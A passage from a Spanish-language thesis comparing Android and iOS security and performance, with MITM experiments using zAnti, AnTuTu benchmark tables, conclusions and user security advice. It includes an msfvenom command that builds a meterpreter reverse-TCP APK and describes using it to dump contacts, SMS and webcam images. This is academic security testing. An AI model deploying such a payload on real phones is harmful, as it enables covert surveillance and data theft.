Con la herramienta Zanti, se procede hacer un redireccionamiento HTTP a la IP
víctima. La ip se la obtiene mediante un escaneo de red interna, después
seleccionamos la acción de ataque: Man in the Middle y por último seleccionamos
en ON en la opción Redirigir HTTP.
65
GRÁFICO N° 8
REDIRECCIÓN DE HTTP EN ANDROID
Elaboración: Ruth Asqui
Fuente: Zanti
En el Gráfico N° 8, se observa la interfaz gráfica de la selección en la opción de
Redirigir HTTP, en donde se encuentra la página por defecto
https://www.pentestserver.com/mitm-success.html que Zanti redirecciona.
En el Gráfico N° 9, se observa que la página web no carga y se redirecciona a la
página que establece Zanti por defecto.
Todas direcciones serán redirigidas al servidor de Zanti, es decir a Zimperium
66
Elaboración: Ruth Asqui
Fuente: Android
Elaboración: Ruth Asqui
Fuente: Samsung
También se inserta un HTML, en donde denegamos el acceso a una página web,
enviando un mensaje de “ERROR DE PAGINA” cuando la víctima quiera acceder
a internet.
Se observa en el Gráfico N° 10, que la página www.cursodehacker.com no puede
cargar y aparece el mensaje de error que se insertó en el HTML de Zanti.
GRÁFICO N° 9
DENEGACIÓN DE SERVICIO EN ANDROID
67
Elaboración: Ruth Asqui
Fuente: Samsung
Integridad
Se procede acceder a la página web que el usuario está navegando en ese
momento y se inserta una imagen desde Zanti; cuando la víctima quiera observar
la información en la web le aparecerá la imagen insertada, evitando que observe
la información real de la página web.
GRÁFICO N° 10
DENEGACIÓN DE SERVICIO EN ANDROID
68
Elaboración: Ruth Asqui
Fuente: Zanti y Samsung
En el Gráfico N° 11, se observa a la izquierda la pantalla de Zanti, en donde se
inserta una imagen que reemplazará a la información de la página web que navega
la víctima; a la derecha se encuentra la pantalla del teléfono de la víctima, en
donde se puede apreciar la imagen insertada en el contenido de la página web
real.
GRÁFICO N° 11
PROCESO DE INSERCIÓN DE IMAGEN EN ANDROID
69
Confidencialidad
A continuación, se procede a acceder a la información que la víctima está
navegando en ese instante. Este ataque se lo realiza desde la aplicación Zanti
mediante la acción Man in the Middle y seleccionando la opción de Pedidos
registrados, para acceder a la sesión que la víctima está navegando
Elaboración: Ruth Asqui
Fuente: Zanti
En el Gráfico N° 12, se observa la información accedida de la página web de la
víctima del teléfono Android, como si la búsqueda hubiese sido de parte del
atacante, es decir accede a la página web como él usuario atacado.
GRÁFICO N° 12
INFORMACIÓN ACCEDIDA EN ANDROID
70
Integridad y confidencialidad con Metasploit
Desde la herramienta Metasploit, se realiza un ataque de tipo intruso mediante la
creación de una aplicación con REVERSE TCP, y extensión .apk, permitiendo el
acceso total al dispositivo víctima. La aplicación creada es de tipo stand-alone, la
cual puede ser insertada dentro de cualquier aplicación para ocultarse y ejecutarse
en segundo plano siendo no visible para la víctima.
Se detalla brevemente a continuación:
Se crea un virus para Android mediante comandos básicos a continuación se
detalla algunas de las líneas ejecutadas:
# msfvenom –p Android/meterpreter/reverse_tcp lhost=192.168.1.150 lport=4321
R> /root/Desktop/App1.apk
Elaboración: Ruth Asqui
Fuente: Kali Linux
En el Gráfico N° 13, se observa la Apk creada, lista para ser instalada en el sistema
operativo Android
GRÁFICO N° 13
CREACIÓN DE VIRUS PARA ANDROID
71
Mediante ingeniería social, el atacante logra realizar la instalación del virus en el
teléfono de la víctima. Al momento de finalizar la instalación del virus, como se
observa en el Gráfico N° 14, la víctima quedará vulnerable de la información
almacenada en el dispositivo.
Elaboración: Ruth Asqui
Fuente: Android
GRÁFICO N° 14
PROCESO DE INSTALACIÓN DE VIRUS EN ANDROID
72
Como se observa en el Gráfico N° 14, la instalación del virus es exitosa. El
atacante está en escucha del sistema operativo Android y puede tener acceso a
los siguientes comandos que se muestra en el Gráfico N° 15.
Elaboración: Ruth Asqui
Fuente: Kali Linux
En la Grafica N° 15, se detalla algunos de los comandos que se puede ejecutar;
entre ellos se trabajó con webcam_snap, webcam_stream, dump_contacts,
dump_sms y hide app icom y send_sms.
El atacante puede enviar mensajes como si fuera un teléfono móvil, solo con saber
el número de teléfono de la víctima.
Este ataque se realiza abriendo la consola de metasploit y ejecutando el comando
Send_sms –d numero_tetefono_victima –t “hola”
GRÁFICO N° 15
COMANDOS DE ACCESO EN ANDROID
73
Se puede enviar mensajes las veces que el atacante desee, es por lo cual se ha
interactuado con el sistema operativo Android, tan solo con la ejecución de
comandos de conocimientos básicos.
Mediante este ataque se puede vulnerar al sistema operativo en la información
almacenada; ya que al enviar un mensaje se puede insertar virus que afecten la
disponibilidad, integridad y confidencialidad del sistema operativo, todo depende
que información el atacante desee vulnerar.
Elaboración: Ruth Asqui
Fuente: Kali Linux
En el Gráfico N° 16, se observa que la víctima recibe un mensaje como si fuera
de su mismo número de teléfono, lo cual fue enviado por el atacante informático.
Mediante una línea de comandos en Metasploit, se logró descargar la lista de
contactos del Android sin que se entere la victima lo que ocurre con la información.
A continuación, se observa los contactos, pero incompletos porque son datos
reales y no se pueden divulgar por confidencialidad.
GRÁFICO N° 16
ENVIO DE MENSAJE A ANDROID
74
Elaboración: Ruth Asqui
Fuente: Kali Linux
En el Gráfico N° 17, se observa la descarga de contactos que fue exitosa, también
se procede a vulnerar los mensajes, grabar en vivo y capturar imágenes del
teléfono de la víctima.
A continuación, se presenta la pantalla de la información que se logró acceder.
GRÁFICO N° 17
LISTA DE CONTACTOS DESCARGADOS DE LA VÍCTIMA
75
Elaboración: Ruth Asqui
Fuente: Kali Linux
En el Gráfico N° 18, se observa los archivos descargados como la lista de
contactos, lista de mensajes, una foto en formato jpg y la captura de la cámara en
formato jpeg
ATAQUES EN IOS.
Disponibilidad
Se bloqueó el acceso al navegador, mediante la herramienta Zanti enviando un
mensaje cuando la victima quiera navegar en la web. Para enviar este mensaje se
utilizo la opcion Man in the Middle y luego la opcion Insertar HTML (Inserta html
especificado en paginas web).
GRÁFICO N° 18
PANTALLA DE INFORMACIÓN ACCEDIDA DE ANDROID
76
Elaboración: Ruth Asqui
Fuente: iOS
En el Gráfico N° 19, se observa que se denegó el servicio de acceso a la página
web, enviando un mensaje de ERROR DE PÁGINA.
Integridad
Se puede enviar cualquier imagen cuando la víctima quiera acceder a internet y
toda página web que acceder será reemplazada por la imagen que inserte en
Zanti, dejando observar la información correcta por una errónea.
GRÁFICO N° 19
DENEGACIÓN DE SERVICIO EN iOS
77
Elaboración: Ruth Asqui
Fuente: Zanti y iOS
En el Gráfico N° 20, se observa la pantalla de Zanti en donde se inserta una
imagen que reemplazará a la información de la víctima de iOS; pero a la derecha
está la pantalla del teléfono iOS, es donde se insertó la imagen en la información
de la página web que la víctima quiere acceder.
Confidencialidad
Se logró acceder a la página web que la víctima está navegando en su teléfono
móvil. Mediante Zanti desde la opción Man in the Middle y Pedidos registrados,
para acceder a la información que la víctima está navegando en la web.
GRÁFICO N° 20
PROCESO DE INSERCIÓN DE IMAGEN EN iOS
78
Elaboración: Ruth Asqui
Fuente: Zanti
En el Gráfico 21, se observa que se pudo acceder a la página web que la víctima
está navegando en internet.
Rendimiento
Se realiza los tests en teléfonos móviles en los aspectos de 3D, UX, CPU y RAM
GRÁFICO N° 21
INFORMACIÓN ACCEDIDA EN IOS
79
Procedimiento de análisis
TESTS REALIZADOS EN ANDROID E iOS
Primer caso
Análisis comparativo de dos teléfonos inteligentes, con sistema operativo Android
(Samsung Galaxy J5) e iOS (iPhone 5).
El análisis de cada teléfono se realiza en tiempos diferentes y no continuos
Elaboración: Ruth Asqui
Fuente: Antutu Benchmark
Elaboración: Ruth Asqui
Fuente: Antutu
En el Gráfico N° 22, se observa los resultados de rendimiento de un test en el
Android, en el que se detalla cada criterio que analiza Antutu para obtener el
rendimiento total de todo el teléfono.
GRÁFICO N° 22
TEST EN ANTUTU - SAMSUNG GALAXY J5
80
Elaboración: Ruth Asqui
Fuente: Antutu Benchmark
En el cuadro N° 14, se observa los puntajes de rendimiento de los cinco tests que
se realizaron en Android de modelo Samsung Galaxy J5.
Elaboración: Ruth Asqui
Fuente: Antutu Benchmark
26288 25703 25273 25466
20247
0
5000
10000
15000
20000
25000
30000
8 7 9 7 5:45
PU
NTU
AC
IÓN
TIEMPO (MIN)
Android
ASPECTOS PUN N° 1 PUN N° 2 PUN N° 3 PUN N° 4 PUN N° 5
3D 845 815 361 842 0
UX 11155 11324 11245 10982 9753
CPU 11319 11034 10853 11136 7878
RAM 2969 2530 2514 2506 2616
PUNTAJE 26288 25703 25273 25466 20247
TIEMPO 8 min 7 min 9 min 7 min 5:45 min
GRÁFICO N° 23
DIAGRAMA DE RENDIMIENTO/TIEMPO – SAMSUNG GALAXY J5
CUADRO N° 14
RESULTADOS DE TESTS - SAMSUNG GALAXY J5
81
Según el análisis, se obtiene como resultado que el puntaje de rendimiento en el
modelo de Android estudiado va disminuyendo, la cantidad en puntaje, no se
mantiene y el tiempo varía por cada prueba realizada
Elaboración: Ruth Asqui
Fuente: Antutu Benchmark
En el Gráfico N° 24, se observa el resultado de rendimiento de uno de los test
realizados en iOS del teléfono iPhone 5 en Antutu Benchmark, teniendo un
rendimiento de 30243 de puntuación.
GRÁFICO N° 24
TEST EN ANTUTU - IPHONE 5
82
Elaboración: Ruth Asqui
Fuente: Antutu Benchmark
En el Cuadro N° 15, se encuentran registrados los rendimientos de los cinco tests
realizados en la aplicación Antutu Benchmark y el tiempo que tarda en la ejecución
de cada test.
Elaboración: Ruth Asqui
Fuente: Antutu Benchmark
30390
30197
30357
30328
30243
30100
30150
30200
30250
30300
30350
30400
30450
4:35 4 5 4 4
PU
NTU
AC
IÓN
TIEMPO (MIN)
iOS
GRÁFICO N° 25
DIAGRAMA DE RENDIMIENTO/TIEMPO EN IPHONE 5
CUADRO N° 15
RESULTADOS DE TESTS - IPHONE 5
ASPECTOS PUN N° 1 PUN N° 2 PUN N° 3 PUN N° 4 PUN N° 5
3D 2044 2045 2059 2068 2046
UX 10020 10360 10401 10236 9950
CPU 12425 12272 12373 12319 12312
RAM 5901 5520 5524 5705 5935
PUNTAJE 30390 30197 30357 30328 30243
TIEMPO 4:35 min 4 min 5 min 4 min 4 min
83
En el Gráfico N° 25, se detallan los resultados obtenidos en iOS del teléfono
iPhone 5, lo cual va disminuyendo el rendimiento, pero después aumenta, es un
estado variado según el número de test que se ejecuten, pero el tiempo de
ejecución no varía muy a menudo.
Segundo caso
A continuación, se realizará el análisis de rendimiento entre el iPhone 6s y
Samsung Galaxy J7. El iOS, iPhone 6S en este caso es de mayor capacidad en
software y hardware, por lo que en el análisis este resultaría con una puntuación
mayor que el Android, Samsung Galaxy J7. El análisis se realiza para verificar qué
tan superior es en rendimiento el teléfono iOS en comparación de Android.
Elaboración: Ruth Asqui
Fuente: Antutu Benchmark
GRÁFICO N° 26
TEST EN ANTUTU - SAMSUNG GALAXY J7
84
En el Gráfico N° 26, se observa el resultado de un test realizado mediante Antutu
Benchmark, por lo cual nos da un resultado de rendimiento en total 39236 del
teléfono Samsung Galaxy J7.
Elaboración: Ruth Asqui
Fuente: Antutu Benchmark
En el cuadro N° 16, se observa los resultados de rendimiento en los tests
realizados en Samsung Galaxy J7, con su tiempo que tarda en realizar cada
prueba en Antutu Benchmark.
ASPECTOS PUN N° 1 PUN N° 2
3D 4523 4475
UX 14512 14141
CPU 14869 14399
RAM 5332 4949
PUNTAJE 39236 37964
TIEMPO 6:37 min 5:10 min
CUADRO N° 16
RESULTADOS DE TESTS - SAMSUNG GALAXY J7
85
Elaboración: Ruth Asqui
Fuente: Antutu Benchmark
En el Gráfico N° 27, del análisis de Android con el modelo de Samsung Galaxy J7,
se realizó solo dos pruebas ya que ocurre lo mismo con el rendimiento de
Samsung Galaxy J5; es decir los resultados continúan disminuyendo de acuerdo
con el número de pruebas que se realice.
39236
37964
37000
37500
38000
38500
39000
39500
6:37 5:10
REN
DIM
ENTO
TIEMPO (MIN)
Android
GRÁFICO N° 27
DIAGRAMA DE RENDIMIENTO/TIEMPO EN SAMSUNG GALAXY J7
86
RESULTADO-iPHONE 6s
Elaboración: Ruth Asqui
Fuente: Antutu Benchmark
En el Gráfico N° 28, se observa el resultado de rendimiento de un test realizado
en iOS del iPhone 6s dando como resultado 76313 en la puntuación, prueba
ejecutada en Antutu BenchmarK.
Elaboración: Ruth Asqui
Fuente: Antutu Benchmark
ASPECTOS PUN N° 1 PUN N° 2
3D 22356 23832
UX 23425 24008
CPU 21450 20980
RAM 7603 7493
PUNTAJE 74834 76313
TIEMPO 4:40 min 4:45 min
GRÁFICO N° 28
TEST EN ANTUTU – iPHONE 6S
CUADRO N° 17
RESULTADOS DE TESTS - IPHONE 6S
87
En el Cuadro N° 17, se observa el resultado de los dos tests que se ejecutó en
Antutu Benchmark, obteniendo en el primer test un rendimiento de 74834 en 4: 40
min y en el último un rendimiento de 76313 en 4:45 min
Elaboración: Ruth Asqui
Fuente: Antutu Benchmark
En el Gráfico N° 29, iPhone 6s va de subida es decir va dejando por debajo al
teléfono SM Galaxy J7.
En los resultados esperados era evidente que iPhone iba a superar a Android,
pero fue de manera rotunda casi duplicando su puntuación de rendimiento.
Tercer caso
A continuación, se realizará el último análisis ahora escogeremos al Android más
potente en la marca de Samsung actualmente y a un iPhone de menor
características en cuanto a hardware y software. La comparación será entre el
iPhone 7 y Samsung Galaxy S8, pero se pondrá a prueba los dos teléfonos de
manera consecutiva; es decir el test arrancará al mismo tiempo para los dos
GRÁFICO N° 29
DIAGRAMA DE RENDIMIENTO/TIEMPO – iPHONE 6S
74834
76313
74000
74500
75000
75500
76000
76500
4:40 4:45
REN
DIM
IEN
TO
TIEMPO (MIN)
iOS
88
móviles, el tiempo de descanso será la diferencia en que para el teléfono que
termine la prueba primero. Se realizarán cinco pruebas para obtener resultados.
Elaboración: Ruth Asqui
Fuente: Antutu Benchmark
En el Cuadro N° 18 de resultados, se observa que el teléfono en la puntuación
inicial es muy alto debido a que es un celular de características superiores a los
demás que se ha hecho referencia en el estudio. Pero en el trascurso del análisis
en tiempos continuos va disminuyendo.
CUADRO N° 18
RESULTADOS DE TESTS - SAMSUNG GALAXY S8 `
ASPECTOS PUN N° 1 PUN N° 2 PUN N° 3 PUN N° 4 PUN N° 5
3D 69424 72214 46426 46243 46241
UX 43101 43509 35811 35306 35330
CPU 30618 30671 21592 21511 21622
RAM 8032 7844 4976 4773 4772
PUNTAJE 151175 154238 108805 107833 107965
TIEMPO 0:05:47 min 0:11:17 min 0:16:54 min 0:22:36 min 0:28:16 min
89
Elaboración: Ruth Asqui
Fuente: Antutu Benchmark
En el Gráfica N° 30, se observa un test realizado en iPhone 7 mediante Antutu en
el cual me da un rendimiento de 102690 de puntuación, resultado de uno de los
tests realizados en este teléfono móvil.
Elaboración: Ruth Asqui
Fuente: Antutu Benchmark
GRÁFICO N° 30
TEST EN ANTUTU – iPHONE 7
CUADRO N° 19
RESULTADOS DE TESTS - IPHONE 7
ASPECTOS PUN N° 1 PUN N° 2 PUN N° 3 PUN N° 4 PUN N° 5
3D 41256 46232 42009 35084 42067
UX 41638 42919 31137 31232 31237
CPU 28385 33936 22752 26717 26473
RAM 9642 10011 9175 9657 9650
PUNTAJE 120921 133098 105073 102690 109427
TIEMPO 0:05:00 min 0:10:00 min 0:14:30 min 0:19:06 min 0:23:41 min
90
En el Cuadro N° 19 de resultados, se observa que el teléfono va aumentando en
el trascurso del tiempo en el estudio y los resultados van aumentando; hasta
mantenerse en una puntuación que se mantiene.
4. Resultados del análisis.
Se justificará los resultados obtenidos en el análisis comparativo en cada sistema
operativo en términos de seguridad de la información y rendimiento.
ANÁLISIS DE SEGURIDAD DE LA INFORMACIÓN
Para obtener los resudados finales se ha realizado el estudio en los teléfonos tanto
en Android como en iOS, para comparar la seguridad de la información con
respecto a confidencialidad, integridad y disponibilidad en cada plataforma.
Elaboración: Ruth Asqui
Fuente: Zanti y Kali Linux
En el Gráfico N° 31, se observa que se realizaron ataques informáticos a Android
e iOS, con Metasploit de Kali Linux donde se obtuvo ataques exitosos con respecto
GRÁFICO N° 31
ATAQUES INFORMÁTICOS EXITOSOS EN ANDROID E iOS
91
a la confidencialidad, mientras con la Aplicación Zanti se obtuvieron ataques
exitosos para Android e iOS en disponibilidad, integridad y confidencialidad.
Elaboración: Ruth Asqui
Fuente: Zanti y Kali Linux
En el Gráficos N° 32, con Metasploit de Kali Linux se representa ataques fallidos
en Android con respecto a los pilares disponibilidad e integridad; mientras con la
aplicación Zanti no se obtuvieron ataques fallidos ni en Android e iOS.
Disponibilidad
Se obtuvieron resultados favorables en los dos sistemas operativos, logrando la
denegación de servicios con los ataques informáticos realizados.
Integridad
Este pilar se realizó varios test en Android e iOS, por lo que se determina que los
dos sistemas operativos son vulnerables mediante ataques informáticos tan solo
con las dos herramientas utilizadas; adquiriendo información de los usuarios.
Confidencialidad
GRÁFICO N° 32
ATAQUES INFORMÁTICOS FALLIDOS EN ANDROID E iOS
92
Los resultados de los ataques informáticos con las dos herramientas, se logró
adquirir información de los dos sistemas operativos y por lo tanto son vulnerables
las dos plataformas.
ANÁLISIS DE RENDIMIENTO
Para obtener los resultados finales se ha realizado el estudio de teléfonos tanto
en Android como en iOS, con características similares y en tiempos variados; y
con características diferentes y en tiempos continuos para obtener resultados
claros y precisos en el rendimiento de las dos plataformas.
Análisis del primer caso
ANDROID HARDWARE > iOS HARDWARE
Elaboración: Ruth Asqui
Fuente: Antutu Benchmark
1 2 3 4 5
iOS 30390 30197 30357 30328 30243
Android 26288 25703 25273 25466 20247
30390 30197 30357 30328 30243
26288 25703 25273 25466
20247
0
5000
10000
15000
20000
25000
30000
35000
REN
DIM
IEN
TO
NÚMERO DE TEST
iOS
Android
GRÁFICO N° 33
ANÁLISIS COMPARATIVO ENTRE SAMSUNG GALAXY J5 E iPHONE 5
93
Según los resultados obtenidos en la evaluación de los dos sistemas operativos,
se obtiene en primer lugar el sistema operativo iOS, que a pesar de que en
hardware sea de menor capacidad, en rendimiento es el mayor
Esto ocurre a que iOS tiene un mejor diseño e integración del hardware con el
software, es por eso que tiene mayor puntaje en el rendimiento, aunque ha sufrido
mayor recalentamiento de la batería que Android y resulta siendo el mejor en
desempeño.
Análisis del segundo caso
ANDROID HARDWARE< iOS HARDWARE
Elaboración: Ruth Asqui
Fuente: Antutu Benchmark
En este caso, se observa claramente que iOS vence con una puntuación duplicada
con respecto a Android, esta prueba se realizó para saber qué tan por encima está
la plataforma iOS; y los resultados fueron claros. Otra vez que claro la arquitectura
de la plataforma vencedora.
1 2
iOS 74834 76313
Android 39236 37964
74834 76313
39236 37964
0
10000
20000
30000
40000
50000
60000
70000
80000
90000
REN
DIM
IEN
TO
NUMERO DE TEST
iOS
Android
GRÁFICO N° 34
ANÁLISIS COMPARATIVO ENTRE SAMSUNG GALAXY J7 E iPHONE 6S
94
Análisis del tercer caso
ANDROID HARDWARE > iOS HARDWARE
Elaboración: Ruth Asqui
Fuente: Antutu Benchmark
En este último análisis, Android empieza con un rendimiento mayor, pero iOS está
por debajo, pero con una pequeña diferencia; en el trascurso de tiempos continuos
y la cantidad de test realizados a ambos sistemas en el mismo momento. Android
empieza a disminuir mientras que iOS aumenta su puntuación hasta llegar casis
al empate en los dos sistemas operativos.
1 2 3 4 5
Android 151175 154238 108805 107833 107965
iOS 120921 133098 105073 102690 109427
151175 154238
108805 107833 107965
120921133098
105073 102690109427
0
20000
40000
60000
80000
100000
120000
140000
160000
180000
REN
DIM
IEN
TO
NÚMERO DE TEST
Android
iOS
GRÁFICO N° 35
ANÁLISIS COMPARATIVO ENTRE SAMSUNG GALAXY S8 E iPHONE 7
95
GUÍA DE RECOMENDACIONES DE SEGURIDAD DE LA INFORMACIÓN Y
RENDIMIENTO DE LOS SISTEMAS OPERATIVOS ANDROID E IOS PARA
LOS USUARIOS.
Eficiencia, eficacia, utilización de la CPU, Tiempo de ejecución y
Desempeño
✓ Elegir el sistema operativo iOS, con respecto a rendimiento ya que esta
plataforma ejecuta las operaciones en menos tiempo que Android, esto
ocurre dado que la arquitectura de iOS es compacta para sus aplicaciones
y el hardware.
✓ No dejarse enganchar de la gran cantidad de almacenamiento que se
pueda aumentar con tarjetas externas en los dispositivos móviles, ya que
esto al momento que el sistema operativo gestiona el hardware con el
software no compactaría, como cuando se integra el hardware y software
con la misma arquitectura del sistema operativo. Es por eso que iOS
funciona mejor en ese aspecto y encontraríamos la eficiencia y eficacia en
la CPU del teléfono.
✓ Los usuarios que les gusta distraerse en juegos que requieran gran
velocidad para interactuar desde sus teléfonos, está presente la plataforma
iOS ya que tiene un gran desempeño en la interfaz gráfica.
Disponibilidad, integridad y confidencialidad
✓ No acceder a redes públicas debido a que cualquier persona mal
intencionada como el ciberdelincuente puede estar conectada a la red y
los usuarios pueden ser víctima a ataques informáticos. Ya que Android
como iOS, son sistemas vulnerables a cualquier ataque informático, es la
razón que los usuarios deben tener cuidado al momento de acceder a
estas redes y no utilizar servicios que presta el teléfono donde se puede
ver afectada seguridad de la información y su dinero.
96
✓ Realizar las actualizaciones temporalmente que brindan Google y Apple
en los sistemas operativos Android e iOS, ya que se lograría cubrir las
vulnerabilidades que se han encontrado anteriormente a la última
actualización realizada, respecto a la seguridad de la información.
✓ En Android, siempre tener cuidado y limitarse en la instalación de las
aplicaciones fuera de la Store y revisar los permisos de acceso; ya que
éstas pueden ser códigos maliciosos y tener control absoluto a la
información almacenada en el dispositivo móvil.
✓ Leer los accesos de recursos del teléfono que tienen las aplicaciones antes
de instalarlas. Debido a que Android obliga al usuario a tener acceso a
ninguno o todos los recursos que la aplicación requiere en el teléfono,
como a contactos, multimedia, localización, etc.; éste medio lo convierte a
Android más vulnerable al instalar aplicaciones que se encuentren fuera e
incluso dentro de la Play Store.
✓ Revisar los accesos de recursos de la aplicación que instala en iOS, para
verificar que información puede ser accedida o no, ya que iOS no muestra
que accesos requiere la aplicación antes de ser instalada. Pero iOS,
después de instalar una aplicación permite al usuario elegir el número de
recursos de acceso del teléfono móvil, puede ser ninguno o más recursos
permitidos. iOS protege al usuario de alguna manera, es la razón que la
seguridad de la información depende mucho del usuario.
✓ Adoptar las configuraciones de seguridad que ofrece Android e iOS de
contraseña, al ingreso de usuario, ya que los sistemas operativos bloquean
el equipo después de varios intentos, de alguna manera nos ayuda a
proteger la información.
✓ Usar antimalware, para la protección del Sistema Operativo de las
empresas más conocidas que brindan este servicio, como puede ser
Kasperky; ya que estos softwares ayudan al igual que se tratase de una
computadora personal y además es gratis.
97
✓ En iOS, adoptar la configuración de copias de seguridad de iThunes, ya
que la información se la puede alojar en un computador, donde se incluye
las configuraciones del teléfono y la mayoría de los datos almacenados en
el mismo; los cuales son accedidos solo por el propietario ya que son
validados con contraseñas por el usuario del dispositivo, ayudando a
proteger la información si ocurre algún ataque informático.
‘
98
CAPITULO IV
RESULTADOS, CONCLUSIONES Y RECOMENDACIONES
Resultados
Los resultados obtenidos en este trabajo de titulación, del análisis comparativo en
Android e iOS en términos de seguridad de la información y rendimiento en los
teléfonos móviles, nos muestra que Android e iOS no son seguros en los
problemas estudiados con respecto a la información registrada por el usuario en
sus dispositivos; pero con respecto a rendimiento se refleja que iOS es el sistema
que brinda mejor rendimiento a los usuarios de teléfonos móviles.
Mediante ataques informáticos realizados tanto en Android como en iOS, se tuvo
ataques exitosos y fallidos al realizar con la misma herramienta en las dos
plataformas; pero se logró vulnerar la disponibilidad, integridad y confidencialidad
con la otra herramienta utilizada en las dos plataformas, determinando que
Android e iOS son vulnerables en la seguridad de la información. Finalmente las
dos plataformas tienen vulnerabilidades en los tres pilares estudiados; es decir
Android e iOS no alcanzan a brindar la seguridad de la información a los usuarios
en los teléfonos móviles.
En el resultado final se puede decir que iOS ha sido la plataforma vencedora en
las tres comparaciones de los seis teléfonos móviles en rendimiento. Esto se debe
a que iOS emplea un gran diseño en su arquitectura, y eso lo evidenciamos en el
análisis del teléfono Samsung 8 e iPhone 7. Android empieza con un rendimiento
excelente pero en el transcurso del tiempo se recalienta más que el iOS y baja su
rendimiento final; iOS a pesar de tener una puntuación menor que Android va
aumentando en el transcurso de la evaluación y llega al punto que igualar al
teléfono Android.
Las características superiores de hardware en Android no han logrado vencer a
iOS, esto ocurre, dado que para el análisis de sistemas operativos no depende
tanto del hardware sino del desempeño de la plataforma; en como gestiona el
hardware con el software. Es el indicador que iOS logra vencer en los tres análisis
comparativos.
99
Respecto a las preguntas científicas se contesta a continuación:
Mediante herramientas de seguridad informática y la aplicación Benckmark; si se
pudo determinar las ventajas y desventajas en los términos de seguridad de la
información y rendimiento en los sistemas operativos Android e iOS; las cuales se
denotan en los resultados de los análisis y en la guía de recomendaciones que
ofrecen las dos plataformas.
Mediante el análisis comparativo en los términos de seguridad de la información y
rendimiento de los sistemas operativos Android e iOS; se logró establecer una
guía de recomendaciones lo cual se espera que sirva de ayuda al usuario que
adquiera y posea un teléfono móvil; ya que en ella se específica de alguna manera
que plataforma elegir y seguir algunos consejos que nos brindan los sistemas
operativos.
100
Conclusiones
✓ Mediante herramientas de seguridad informática se realizó análisis de
seguridad de la información en Android e iOS, se pudo evidenciar que los
dos sistemas operativos son vulnerables, para mencionar ventajas y
desventajas que favorezcan a los usuarios que brinden estos sistemas
influye mucho del uso del dispositivo por parte del usuario. La desventaja
que existe en los dos sistemas operativos es que pueden ser atacados en
cualquier momento porque aún no han logrado cubrir la seguridad por
completo por parte de Android e iOS. Pero estos sistemas operativos
brindan la ventaja que el usuario puede proteger su información mediante
las configuraciones que están disponibles en cada plataforma; es la razón
por la que los usuarios deben tener mucho cuidado y seguir
recomendaciones, y aplicar configuraciones para proteger la seguridad de
la información en sus dispositivos.
✓ Se ha logrado realizar el análisis comparativo de rendimiento entre los
sistemas operativos Android e iOS en varias versiones de teléfonos
móviles; midiendo éste término desde la misma aplicación compatible para
las dos plataformas y que poseen en cada tienda. La aplicación Antutu
Benchmark mediante la cantidad de pruebas realizadas, permitió
determinar el sistema operativo que brinda a los usuarios mayor
rendimiento entre las dos plataformas de los equipos móviles siendo este
iOS.
✓ Se logró plantear al usuario una guía de recomendaciones de seguridad
de la información y rendimiento mediante los resultados que se obtuvieron
en el estudio comparativo de los criterios de elección mediante el análisis
cualitativo en cada término.
101
Recomendaciones
✓ Se recomienda realizar un estudio de las vulnerabilidades existentes en
Android e iOS de teléfonos móviles inteligentes, para determinar la
plataforma con mayor número de vulnerabilidades y dar a conocer al
usuario la seguridad de la información que ofrece cada sistema operativo
móvil de acuerdo a los resultados de las vulnerabilidades obtenidas en el
análisis.
✓ Utilizar otras herramientas existentes diferentes a las Benchmark que
miden el rendimiento en los sistemas operativos Android e iOS, para
verificar si los resultados coinciden con el resultado del estudio realizado
en este trabajo de titulación.
✓ Se recomienda que los resultados obtenidos en el estudio se planteen en
un reporte amigable de seguridad de la información y rendimiento de
Android e iOS; para dar a conocer al usuario los riesgos expuestos en cada
plataforma, mediante análisis que requiera el estudio propuesto.
102
BIBLIOGRAFÍA
Aguirre, J. R. (2006). Libro electrónico de seguridad informática y criptografía.
Universidad Politécnica de Madrid.
Albarracín, J. C., Camargo, J. J., & Parra, L. M. (2013). SEGURIDAD EN
DISPOSITIVOS MÓVILES CON SISTEMAS OPERATIVOS ANDROID E
IOS. Tecnología Investigación y Academia, 1(2).
Alegsa, L. (2013). Definición de standalone (programa). Recuperado 20 de
febrero de 2018, a partir de http://www.alegsa.com.ar/Dic/standalone.php
Aponte, S., & Dávila, C. (2011). Sistemas operativos móviles: funcionalidades,
efectividad y aplicaciones útiles en Colombia. Recuperado de
http://repository. ean. edu.
co/bitstream/handle/10882/761/AponteSanly2011. pdf.
Asamblea Nacional Registro Oficial. (2014). Código Orgánico Integral Penal.
Recuperado a partir de
http://biblioteca.defensoria.gob.ec/handle/37000/497
Barranger, D. (2014). Cómo evaluar el rendimiento de tu Android. Recuperado
14 de diciembre de 2017, a partir de
https://www.softonic.com/articulos/como-evaluar-el-rendimiento-de-tu-
android
Baz, A., Ferreira, I., Alvarez, M., & García, R. (2011). Dispositivos móviles.
EPSIG Ing. Telecomunicación Universidad de Oviedo.
BBC, M. (2015). bbc android e ios - Buscar con Google. Recuperado 19 de
noviembre de 2017, a partir de
https://www.google.com.ec/search?q=bbc+android+e+ios&oq=bbc+androi
d+e+ios&aqs=chrome..69i57.12755j0j8&sourceid=chrome&ie=UTF-8
103
Bermúdez, Y. M., & López, J. G. (2011). Análisis comparativo entre sistemas
operativos de dispositivos móviles Android, Iphone y Blackberry (B.S.
thesis). Pereira: Universidad Tecnológica de Pereira.
Blanco, P., Camarero, J., Fumero, A., Werterski, A., & Rodríguez, P. (2009).
Metodología de desarrollo ágil para sistemas móviles. Introducción al
desarrollo con Android y el iPhone. Dr. en Ing. Sist. Telemáticos, 1–30.
Cárdenas, D. D. (2012). Análisis de Seguridad de la información en los
Dispositivos Móviles Smartphone (B.S. thesis). Quito: Universidad Israel,
2012.
Carvajal, K. J., & Sasig, C. F. (2012). Análisis comparativo entre las plataformas
de desarrollo de aplicaciones móviles para los sistemas operativos
Android y IOS. (B.S. thesis). Escuela Superior Politécnica de
Chimborazo.
Casas, S. I., & Enriquez, J. G. (2014). Usabilidad en aplicaciones móviles.
Informes Científicos-Técnicos UNPA, 5(2), 25–47.
Conde, R. (2017). Parámetros reales para identificar gamas de los celulares.
Recuperado 19 de febrero de 2018, a partir de
https://www.aboutespanol.com/parametros-reales-para-identificar-gamas-
de-los-celulares-580836
Correa, M. (2014). Composición del sistema operativo móvil iOS de Apple y el
hardware y software que lo utilizan.
Duarte, E. (2012, julio 11). Las 8 Mejores Herramientas De Seguridad Y Hacking.
Recuperado 31 de diciembre de 2017, a partir de
http://blog.capacityacademy.com/2012/07/11/las-8-mejores-herramientas-
de-seguridad-y-hacking/
104
Durán, Á. J., Peinado, J. L., & Rosado, A. A. (2015). Comparación de dos
tecnologías de desarrollo de aplicaciones móviles desde la perspectiva
del rendimiento como atributo de calidad. Scientia et technica, 20(1).
